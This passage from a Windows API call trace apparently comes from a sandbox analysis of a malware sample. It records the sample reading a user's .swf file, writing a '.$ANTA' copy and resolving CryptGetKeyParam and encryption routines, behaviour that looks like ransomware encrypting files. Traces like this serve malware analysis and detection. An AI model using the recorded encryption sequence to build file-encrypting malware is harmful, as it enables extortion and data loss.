H0jeo_wwrX\\jyNO5NcyIG2nrd\\3lc9YJH.swf" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\jyno5ncyig2nrd\\3lc9yjh.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0101.121] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.121] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7a8 | out: lpNewFilePointer=0x0) returned 1 [0101.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0101.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0101.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0101.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0101.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0101.121] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0101.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0101.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0101.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0101.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0101.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0101.121] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0101.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0101.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0101.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0101.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0101.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0101.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0101.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0101.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42d9438 | out: hHeap=0x1780000) returned 1 [0101.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0101.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0101.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0101.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0101.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0101.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0101.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0101.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0101.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0101.122] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\jyno5ncyig2nrd")) returned 0x10 [0101.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0101.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0101.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0101.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0101.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0101.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0101.122] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\3lc9YJH.swf.$ANTA" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\jyno5ncyig2nrd\\3lc9yjh.swf.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0101.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0101.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0101.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0101.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0101.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0101.123] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0101.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0101.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0101.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0101.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0101.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0101.123] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0101.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0101.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0101.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0101.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0101.126] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7f8 | out: lpNewFilePointer=0x0) returned 1 [0101.126] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e820*=0x10000, lpOverlapped=0x0) returned 1 [0101.127] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e820*=0x8727, lpOverlapped=0x0) returned 1 [0101.128] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e820*=0x0, lpOverlapped=0x0) returned 1 [0101.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0101.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0101.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0101.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0d020 | out: hHeap=0x1780000) returned 1 [0101.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0101.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0101.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0101.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0101.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0101.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0101.131] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0101.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0101.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0101.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0101.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0101.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0101.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0101.281] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0101.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0101.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0101.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0101.281] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0101.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0101.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0101.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0101.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0101.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0101.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0101.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0101.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0101.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0101.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0101.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0101.282] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0101.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0101.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0101.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0101.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0101.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0101.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0101.282] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0101.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0101.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0101.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0101.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0101.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0101.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0101.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0101.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0101.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0101.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0101.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0101.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0101.282] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0101.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0101.283] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0101.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918f8 | out: hHeap=0x1780000) returned 1 [0101.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0101.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0101.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0101.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0101.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0101.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0101.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0101.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0101.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0101.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0101.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0101.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0101.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0101.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0101.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0101.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0101.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0101.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0101.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0101.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2668 | out: hHeap=0x1780000) returned 1 [0101.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0101.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0101.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0101.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0101.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0101.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0101.284] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0101.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0101.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0101.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0101.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0101.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0101.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0101.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0101.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0101.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0101.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0101.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0101.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0101.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0101.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0101.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0101.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0101.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0101.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0101.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0101.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0101.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0101.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0101.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0101.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0101.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797108, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0101.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0101.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0101.285] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0101.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0101.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0101.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0101.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0101.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0101.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0101.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0101.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0101.285] CryptGetKeyParam (in: hKey=0x41ac540, dwParam=0x7, pbData=0x43e2a30, pdwDataLen=0x144db58, dwFlags=0x0 | out: pbData=0x43e2a30*=0x6610, pdwDataLen=0x144db58*=0x4) returned 1 [0101.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b50 [0101.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eab80 [0101.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0101.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0101.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0101.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0101.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d00 [0101.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0101.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0101.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0101.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0101.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0101.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0101.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b70 [0101.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0101.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0101.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0101.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0101.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0101.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0101.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cb0 [0101.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0101.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0101.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0101.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0101.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0101.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0101.286] RtlAllocateHeap 